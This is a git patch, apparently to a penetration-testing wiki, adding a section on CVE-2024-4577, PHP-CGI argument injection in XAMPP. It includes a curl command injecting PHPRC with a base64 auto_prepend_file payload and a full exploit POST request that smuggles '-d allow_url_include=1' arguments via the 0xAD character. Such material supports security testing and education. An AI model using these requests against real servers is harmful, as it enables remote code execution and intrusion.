From 35598145a496f11ed6a32ca48c598444e3ec7a1b Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 17 Jul 2024 12:15:26 +0000 Subject: [PATCH] GITBOOK-4368: No subject --- .../pentesting-web/php-tricks-esp/README.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index ae039fe40..6be00a853 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -336,6 +336,31 @@ If you find a vulnerability that allows you to **modify env variables in PHP** ( * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'` * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845). +### XAMPP CGI RCE - CVE-2024-4577 + +The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body: + +```jsx +-d allow_url_include=1 -d auto_prepend_file=php://input +``` + +Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/): + +```jsx +POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 +Host: {{host}} +User-Agent: curl/8.3.0 +Accept: */* +Content-Length: 23 +Content-Type: application/x-www-form-urlencoded +Connection: keep-alive + + + +``` + ## PHP Static analysis Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):